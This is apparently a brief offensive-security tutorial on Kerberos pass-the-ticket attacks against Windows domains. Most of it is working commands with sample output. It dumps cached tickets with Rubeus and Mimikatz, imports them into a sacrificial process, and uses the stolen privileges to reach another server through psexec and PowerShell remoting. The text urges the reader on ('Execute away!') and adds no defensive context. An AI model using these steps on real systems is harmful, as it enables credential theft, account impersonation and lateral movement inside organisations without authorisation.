A Kerberos ticket can be considered a less permanent version of NTLM hashes, they only typically last for 10 hours, and are transferable across machines.

Pass-the-ticket – as the name suggests – is an authentication method using Kerberos tickets without knowing an account’s actual password.

We can enumerate available tickets with the built-in command klist.

> klist

Current LogonId is 0:0x5ea91

Cached Tickets: (1)

#0>     Client: user @ DOMAIN.LOCAL
        Server: krbtgt/DOMAIN.LOCAL @ DOMAIN.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 7/9/2020 5:19:55 (local)
        End Time:   7/9/2020 15:09:55 (local)
        Renew Time: 7/11/2020 12:14:43 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96

Or dump tickets with Rebeus and Mimikatz.

Rubeus dump
Mimikatz sekurlsa::tickets

The resulting base64 string can be saved as “.kirbi” files and imported with the following commands.

Rubeus ptt /ticket:<.kirbi>
Mimikatz kerberos:ptt <.kirbi>

That’s it! Your current session should have the privileges of the original ticket holder.

It’s also a good idea to first create a sacrificial process to pass the ticket to. This is to prevent overwriting existing tickets in your current session.

Rubeus createnetonly /program:"C:\Windows\hh.exe"
...
[*] Action: Create Process (/netonly)

[*] Showing process : False
[+] Process : 'C:\Windows\hh.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 10291
[+] LUID : 0x8a06289

Rubeus ptt /luid:0x8a06289 /ticket:<.kirbi>
Impersonateprocess 10291

Execute away!

ls \\SRV1\C$

psexec -accepteula \\SRV1 cmd.exe

PowerShellRemotingCommand "SRV1" "whoami; hostname"

In-depth Rubeus usage and more kerberos ticket info: